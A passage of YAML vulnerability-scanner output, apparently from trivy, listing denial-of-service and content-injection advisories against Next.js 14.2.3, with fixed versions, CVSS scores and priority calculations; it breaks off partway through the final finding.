|
|
severity_score: 7
|
|
epss_multiplier: 1.17904
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 091bd6d2c4384d47
|
|
ruleId: GHSA-5j59-xgg2-r9c4
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
|
|
title: GHSA-5j59-xgg2-r9c4
|
|
description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\
|
|
\ in React Server Components was incomplete and did not fully mitigate denial-of-service\
|
|
\ conditions across all payload types. As a result, certain crafted inputs could\
|
|
\ still trigger excessive resource consumption. \n\nThis vulnerability affects\
|
|
\ React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle\
|
|
\ or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when\
|
|
\ using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\
|
|
\nA malicious actor can send a specially crafted HTTP request to a Server Function\
|
|
\ endpoint that, when deserialized, causes the React Server Components runtime\
|
|
\ to enter an infinite loop. This can lead to sustained CPU consumption and cause\
|
|
\ the affected server process to become unresponsive, resulting in a denial-of-service\
|
|
\ condition in unpatched environments."
|
|
remediation: https://github.com/advisories/GHSA-5j59-xgg2-r9c4
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
raw:
|
|
VulnerabilityID: GHSA-5j59-xgg2-r9c4
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60,
|
|
16.0.10, 16.1.0-canary.19
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-5j59-xgg2-r9c4
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24
|
|
Title: Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up
|
|
Description: "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956)\
|
|
\ in React Server Components was incomplete and did not fully mitigate denial-of-service\
|
|
\ conditions across all payload types. As a result, certain crafted inputs\
|
|
\ could still trigger excessive resource consumption. \n\nThis vulnerability\
|
|
\ affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that\
|
|
\ bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and\
|
|
\ 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\
|
|
\nA malicious actor can send a specially crafted HTTP request to a Server Function\
|
|
\ endpoint that, when deserialized, causes the React Server Components runtime\
|
|
\ to enter an infinite loop. This can lead to sustained CPU consumption and\
|
|
\ cause the affected server process to become unresponsive, resulting in a denial-of-service\
|
|
\ condition in unpatched environments."
|
|
Severity: HIGH
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4
|
|
- https://nextjs.org/blog/security-update-2025-12-11
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-67779
|
|
- https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-55184
|
|
- https://www.facebook.com/security/advisories/cve-2025-67779
|
|
PublishedDate: '2025-12-12T17:21:57Z'
|
|
LastModifiedDate: '2026-01-15T21:55:04Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2dd16d93f72241ba
|
|
ruleId: GHSA-8h8q-6873-q5fj
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js Vulnerable to Denial of Service with Server Components
|
|
title: GHSA-8h8q-6873-q5fj
|
|
description: "A vulnerability affects certain React Server Components packages for\
|
|
\ versions 19.x and frameworks that use the affected packages, including Next.js\
|
|
\ 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream\
|
|
\ as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\
|
|
\ \n\nA specially crafted HTTP request can be sent to any App Router Server Function\
|
|
\ endpoint that, when deserialized, may trigger excessive CPU usage. This can\
|
|
\ result in denial of service in unpatched environments."
|
|
remediation: https://github.com/advisories/GHSA-8h8q-6873-q5fj
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
raw:
|
|
VulnerabilityID: GHSA-8h8q-6873-q5fj
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-8h8q-6873-q5fj
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529
|
|
Title: Next.js Vulnerable to Denial of Service with Server Components
|
|
Description: "A vulnerability affects certain React Server Components packages\
|
|
\ for versions 19.x and frameworks that use the affected packages, including\
|
|
\ Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked\
|
|
\ upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh).\
|
|
\ \n\nA specially crafted HTTP request can be sent to any App Router Server\
|
|
\ Function endpoint that, when deserialized, may trigger excessive CPU usage.\
|
|
\ This can result in denial of service in unpatched environments."
|
|
Severity: HIGH
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj
|
|
- https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-23870
|
|
PublishedDate: '2026-05-11T14:50:27Z'
|
|
LastModifiedDate: '2026-05-11T14:50:27Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3cc6d1d18936ff7b
|
|
ruleId: GHSA-h25m-26qc-wcjf
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js HTTP request deserialization can lead to DoS when using insecure
|
|
React Server Components
|
|
title: GHSA-h25m-26qc-wcjf
|
|
description: 'A vulnerability affects certain React Server Components packages for
|
|
versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages,
|
|
including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is
|
|
tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).
|
|
|
|
|
|
A specially crafted HTTP request can be sent to any App Router Server Function
|
|
endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory
|
|
exceptions, or server crashes. This can result in denial of service in unpatched
|
|
environments.'
|
|
remediation: https://github.com/advisories/GHSA-h25m-26qc-wcjf
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
raw:
|
|
VulnerabilityID: GHSA-h25m-26qc-wcjf
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61,
|
|
16.0.11, 16.1.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-h25m-26qc-wcjf
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b
|
|
Title: Next.js HTTP request deserialization can lead to DoS when using insecure
|
|
React Server Components
|
|
Description: 'A vulnerability affects certain React Server Components packages
|
|
for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected
|
|
packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router.
|
|
The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).
|
|
|
|
|
|
A specially crafted HTTP request can be sent to any App Router Server Function
|
|
endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory
|
|
exceptions, or server crashes. This can result in denial of service in unpatched
|
|
environments.'
|
|
Severity: HIGH
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-23864
|
|
- https://vercel.com/changelog/summary-of-cve-2026-23864
|
|
PublishedDate: '2026-01-28T15:38:01Z'
|
|
LastModifiedDate: '2026-01-28T15:38:01Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2384ada699a3c38e
|
|
ruleId: GHSA-mwv6-3258-q52c
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next Vulnerable to Denial of Service with Server Components
|
|
title: GHSA-mwv6-3258-q52c
|
|
description: 'A vulnerability affects certain React packages for versions 19.0.0,
|
|
19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the
|
|
affected packages, including Next.js 15.x and 16.x using the App Router. The issue
|
|
is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).
|
|
|
|
|
|
A malicious HTTP request can be crafted and sent to any App Router endpoint that,
|
|
when deserialized, can cause the server process to hang and consume CPU. This
|
|
can result in denial of service in unpatched environments.'
|
|
remediation: https://github.com/advisories/GHSA-mwv6-3258-q52c
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
raw:
|
|
VulnerabilityID: GHSA-mwv6-3258-q52c
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59,
|
|
16.0.9, 16.1.0-canary.17
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-mwv6-3258-q52c
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a
|
|
Title: Next Vulnerable to Denial of Service with Server Components
|
|
Description: 'A vulnerability affects certain React packages for versions 19.0.0,
|
|
19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the
|
|
affected packages, including Next.js 15.x and 16.x using the App Router. The
|
|
issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).
|
|
|
|
|
|
A malicious HTTP request can be crafted and sent to any App Router endpoint
|
|
that, when deserialized, can cause the server process to hang and consume CPU.
|
|
This can result in denial of service in unpatched environments.'
|
|
Severity: HIGH
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c
|
|
- https://nextjs.org/blog/security-update-2025-12-11
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-55184
|
|
PublishedDate: '2025-12-11T22:49:27Z'
|
|
LastModifiedDate: '2025-12-11T22:49:28Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9076a243c95555c6
|
|
ruleId: GHSA-q4gf-8mx6-v5v3
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js has a Denial of Service with Server Components
|
|
title: GHSA-q4gf-8mx6-v5v3
|
|
description: 'A vulnerability affects certain React Server Components packages for
|
|
versions 19.x and frameworks that use the affected packages, including Next.js
|
|
13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream
|
|
as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg).
|
|
You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).
|
|
|
|
|
|
A specially crafted HTTP request can be sent to any App Router Server Function
|
|
endpoint that, when deserialized, may trigger excessive CPU usage. This can result
|
|
in denial of service in unpatched environments.'
|
|
remediation: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
raw:
|
|
VulnerabilityID: GHSA-q4gf-8mx6-v5v3
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.15, 16.2.3
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8
|
|
Title: Next.js has a Denial of Service with Server Components
|
|
Description: 'A vulnerability affects certain React Server Components packages
|
|
for versions 19.x and frameworks that use the affected packages, including Next.js
|
|
13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream
|
|
as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg).
|
|
You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).
|
|
|
|
|
|
A specially crafted HTTP request can be sent to any App Router Server Function
|
|
endpoint that, when deserialized, may trigger excessive CPU usage. This can
|
|
result in denial of service in unpatched environments.'
|
|
Severity: HIGH
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3
|
|
- https://vercel.com/changelog/summary-of-cve-2026-23869
|
|
PublishedDate: '2026-04-10T15:35:47Z'
|
|
LastModifiedDate: '2026-04-10T15:35:47Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.333333333333336
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 85e92c5109af9055
|
|
ruleId: CVE-2024-47831
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Next.js image optimization has Denial of Service condition'
|
|
title: CVE-2024-47831
|
|
description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x,
|
|
12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in
|
|
the image optimization feature which allows for a potential Denial of Service
|
|
(DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js`
|
|
file that is configured with `images.unoptimized` set to `true` or `images.loader`
|
|
set to a non-default value nor the Next.js application that is hosted on Vercel
|
|
are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround,
|
|
ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader`
|
|
or `images.loaderFile` assigned.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2024-47831
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id029
|
|
- CWE-674
|
|
raw:
|
|
VulnerabilityID: CVE-2024-47831
|
|
VendorIDs:
|
|
- GHSA-g77x-44xx-532m
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.7
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-47831
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81
|
|
Title: 'next.js: Next.js image optimization has Denial of Service condition'
|
|
Description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x,
|
|
12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability
|
|
in the image optimization feature which allows for a potential Denial of Service
|
|
(DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js`
|
|
file that is configured with `images.unoptimized` set to `true` or `images.loader`
|
|
set to a non-default value nor the Next.js application that is hosted on Vercel
|
|
are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround,
|
|
ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader`
|
|
or `images.loaderFile` assigned.
|
|
Severity: MEDIUM
|
|
CweIDs: *id029
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
nvd: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
|
|
V3Score: 5.9
|
|
V40Score: 4.6
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 5.9
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2024-47831
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-47831
|
|
- https://www.cve.org/CVERecord?id=CVE-2024-47831
|
|
PublishedDate: '2024-10-14T18:15:05.013Z'
|
|
LastModifiedDate: '2024-11-08T15:39:21.823Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 14.029866666666669
|
|
epss: 0.01306
|
|
epss_percentile: 0.79982
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.05224
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ec4e4216710b1a54
|
|
ruleId: CVE-2024-56332
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions'
|
|
title: CVE-2024-56332
|
|
description: 'Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2,
|
|
Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers
|
|
to construct requests that leaves requests to Server Actions hanging until the
|
|
hosting provider cancels the function execution. This vulnerability can also be
|
|
used as a Denial of Wallet (DoW) attack when deployed in providers billing by
|
|
response times. (Note: Next.js server is idle during that time and only keeps
|
|
the connection open. CPU and memory footprint are low during that time.). Deployments
|
|
without any protection against long running Server Action invocations are especially
|
|
vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration
|
|
on function execution to reduce the risk of excessive billing. This is the same
|
|
issue as if the incoming HTTP request has an invalid `Content-Length` header or
|
|
never closes. If the host has no other mitigations to those then this vulnerability
|
|
is novel. This vulnerability affects only Next.js deployments using Server Actions.
|
|
The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that
|
|
users upgrade to a safe version. There are no official workarounds.'
|
|
remediation: https://avd.aquasec.com/nvd/cve-2024-56332
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id030
|
|
- CWE-770
|
|
raw:
|
|
VulnerabilityID: CVE-2024-56332
|
|
VendorIDs:
|
|
- GHSA-7m27-7ghc-44w9
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 13.5.8, 14.2.21, 15.1.2
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-56332
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5
|
|
Title: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions'
|
|
Description: 'Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2,
|
|
Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers
|
|
to construct requests that leaves requests to Server Actions hanging until the
|
|
hosting provider cancels the function execution. This vulnerability can also
|
|
be used as a Denial of Wallet (DoW) attack when deployed in providers billing
|
|
by response times. (Note: Next.js server is idle during that time and only keeps
|
|
the connection open. CPU and memory footprint are low during that time.). Deployments
|
|
without any protection against long running Server Action invocations are especially
|
|
vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration
|
|
on function execution to reduce the risk of excessive billing. This is the same
|
|
issue as if the incoming HTTP request has an invalid `Content-Length` header
|
|
or never closes. If the host has no other mitigations to those then this vulnerability
|
|
is novel. This vulnerability affects only Next.js deployments using Server Actions.
|
|
The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend
|
|
that users upgrade to a safe version. There are no official workarounds.'
|
|
Severity: MEDIUM
|
|
CweIDs: *id030
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2024-56332
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-56332
|
|
- https://www.cve.org/CVERecord?id=CVE-2024-56332
|
|
PublishedDate: '2025-01-03T21:15:13.55Z'
|
|
LastModifiedDate: '2025-09-10T15:48:41.83Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.559466666666669
|
|
epss: 0.00424
|
|
epss_percentile: 0.62356
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.01696
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 396a9deaca66993c
|
|
ruleId: CVE-2025-55173
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization'
|
|
title: CVE-2025-55173
|
|
